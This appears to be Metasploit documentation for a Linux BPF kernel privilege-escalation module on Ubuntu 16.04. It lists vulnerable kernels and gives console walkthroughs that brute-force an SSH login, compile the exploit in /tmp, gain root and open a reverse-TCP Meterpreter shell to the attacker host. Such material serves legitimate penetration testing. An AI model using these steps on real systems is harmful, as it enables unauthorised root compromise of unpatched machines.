## Notes

This module (and the original exploit) are written in several parts: hello, doubleput, and suidhelper.

Mettle at times on this exploit will give back an invalid session number error.  In these cases payload/linux/x64/shell/bind_tcp seemed to always work.

As of PR submission, the original shell becomes unresposive when the root shell occurs.  Metasm fails to compile due to fuse.h being required.

As of PR submission, killing of the process hello and doubleput has to occur manually.  /tmp/fuse_mount also needs to be unmounted and deleted.

## Creating A Testing Environment

There are a few requirements for this module to work:

  1. CONFIG_BPF_SYSCALL=y must be set in the kernel (default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
  2. kernel.unprivileged_bpf_disabled can't be set to 1 (default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
  3. fuse needs to be installed (non-default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
  
  Using Ubuntu 16.04, simply `sudo apt-get install fuse` and you're all set!

This module has been tested against:

  1. Ubuntu 16.04 linux-image-4.4.0-38-generic (pre-compile & live compile)
  2. Ubuntu 16.04 (default kernel) linux-image-4.4.0-21-generic (pre-compile & live compile)

This module was not tested against, but may work against:

  1. Fedora 24 < [kernel-4.5.4-300.fc24](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
  2. Fedora 23 < [kernel-4.5.5-201.fc23](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
  3. Fedora 22 < [kernel-4.4.10-200.fc22](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
  4. Debian >= 4.4~rc4-1~exp1, < Fixed in version [4.5.3-1](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=823603)
  5. Ubuntu 14.04.1 <= [4.4.0-22.39](https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1578705/comments/3)

## Verification Steps

  1. Start msfconsole
  2. Exploit a box via whatever method
  4. Do: `use exploit/linux/local/bpf_priv_esc`
  5. Do: `set session #`
  6. Do: `set verbose true`
  7. Do: `exploit`

## Options

  **MAXWAIT**

  The first stage of this priv esc can take ~35seconds to execute.  This is the timer on how long we should wait till we give up on the first stage finishing.  Defaults to 120 (seconds)

  **WritableDir**

  A folder we can write files to.  Defaults to /tmp

  **COMPILE**
  
  If we should live compile on the system, or drop pre-created binaries.  Auto will determine if gcc/libs are installed to compile live on the system.  Defaults to Auto

## Scenarios

### Ubuntu 16.04 (with Linux 4.4.0-38-generic)

#### Initial Access

    msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(ssh_login) > set rhosts 192.168.199.130
    rhosts => 192.168.199.130
    msf auxiliary(ssh_login) > set username ubuntu
    username => ubuntu
    msf auxiliary(ssh_login) > set password ubuntu
    password => ubuntu
    msf auxiliary(ssh_login) > exploit
    
    [*] SSH - Starting bruteforce
    [+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) Linux ubuntu 4.4.0-38-generic #57-Ubuntu SMP Tue Sep 6 15:42:33 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
    [!] No active DB -- Credential data will not be saved!
    [*] Command shell session 1 opened (192.168.199.131:39175 -> 192.168.199.130:22) at 2016-09-27 12:25:31 -0400
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

#### Escalate

In this scenario, gcc and libfuse-dev are both installed so we can live compile on the system.

    msf auxiliary(ssh_login) > use exploit/linux/local/bpf_priv_esc
    msf exploit(bpf_priv_esc) > set verbose true
    verbose => true
    msf exploit(bpf_priv_esc) > set session 1
    session => 1
    msf exploit(bpf_priv_esc) > set lhost 192.168.199.131
    lhost => 192.168.199.131
    msf exploit(bpf_priv_esc) > exploit
    
    [*] Started reverse TCP handler on 192.168.199.131:4444 
    [+] CONFIG_BPF_SYSCAL is set to yes
    [+] kernel.unprivileged_bpf_disabled is NOT set to 1
    [+] fuse is installed
    [+] libfuse-dev is installed
    [+] gcc is installed
    [*] Live compiling exploit on system
    [*] Writing files to target
    [*] Writing hello to /tmp/hello.c
    [*] Max line length is 65537
    [*] Writing 2760 bytes in 1 chunks of 9767 bytes (octal-encoded), using printf
    [*] Writing doubleput to /tmp/doubleput.c
    [*] Max line length is 65537
    [*] Writing 5182 bytes in 1 chunks of 18218 bytes (octal-encoded), using printf
    [*] Writing suidhelper to /tmp/suidhelper.c
    [*] Max line length is 65537
    [*] Writing 352 bytes in 1 chunks of 1219 bytes (octal-encoded), using printf
    [*] Compiling all modules on target
    [*] Writing payload to /tmp/AyDJSaMM
    [*] Max line length is 65537
    [*] Writing 188 bytes in 1 chunks of 506 bytes (octal-encoded), using printf
    [*] Starting execution of priv esc.  This may take about 120 seconds
    [+] got root, starting payload
    [*] Transmitting intermediate stager...(126 bytes)
    [*] Sending stage (2412016 bytes) to 192.168.199.130
    [*] Meterpreter session 2 opened (192.168.199.131:4444 -> 192.168.199.130:43734) at 2016-09-27 12:26:06 -0400
    [*] Cleaning up...
    
    meterpreter > getuid
    Server username: uid=0, gid=0, euid=0, egid=0
    meterpreter > sysinfo
    Computer     : 192.168.199.130
    OS           : Ubuntu 16.04 (Linux 4.4.0-38-generic)
    Architecture : x86_64
    Meterpreter  : x64/linux
    
#### Escalate w/ pre-compiled binaries

It is possible to force pre-compiled binaries, however in this case we look at a system that doesn't have libfuse-dev (ubuntu) installed

    msf auxiliary(ssh_login) > use exploit/linux/local/bpf_priv_esc
    msf exploit(bpf_priv_esc) > set verbose true
    verbose => true
    msf exploit(bpf_priv_esc) > set session 1
    session => 1
    msf exploit(bpf_priv_esc) > set lhost 192.168.199.131
    lhost => 192.168.199.131
    msf exploit(bpf_priv_esc) > exploit
    
    [*] Started reverse TCP handler on 192.168.199.131:4444 
    [+] CONFIG_BPF_SYSCAL is set to yes
    [+] kernel.unprivileged_bpf_disabled is NOT set to 1
    [+] fuse is installed
    [-] libfuse-dev is not installed.  Compiling will fail.
    [*] Dropping pre-compiled exploit on system
    [*] Writing pre-compiled binarys to target
    [*] Max line length is 65537
    [*] Writing 9576 bytes in 1 chunks of 24954 bytes (octal-encoded), using printf
    [*] Max line length is 65537
    [*] Writing 13920 bytes in 1 chunks of 36828 bytes (octal-encoded), using printf
    [*] Max line length is 65537
    [*] Writing 8840 bytes in 1 chunks of 21824 bytes (octal-encoded), using printf
    [*] Writing payload to /tmp/AyDJSaMM
    [*] Max line length is 65537
    [*] Writing 188 bytes in 1 chunks of 506 bytes (octal-encoded), using printf
    [*] Starting execution of priv esc.  This may take about 120 seconds
    [+] got root, starting payload
    [-] This exploit may require process killing of 'hello', and 'doubleput' on the target
    [-] This exploit may requires manual umounting of /tmp/fuse_mount via 'fusermount -z -u /tmp/fuse_mount' on the target
    [-] This exploit may requires manual deletion of /tmp/fuse_mount via 'rm -rf /tmp/fuse_mount' on the target
    [*] Transmitting intermediate stager...(126 bytes)
    [*] Sending stage (2412016 bytes) to 192.168.199.130
    [*] Meterpreter session 2 opened (192.168.199.131:4444 -> 192.168.199.130:55522) at 2016-09-28 08:08:04 -0400
    
    meterpreter > getuid
    Server username: uid=0, gid=0, euid=0, egid=0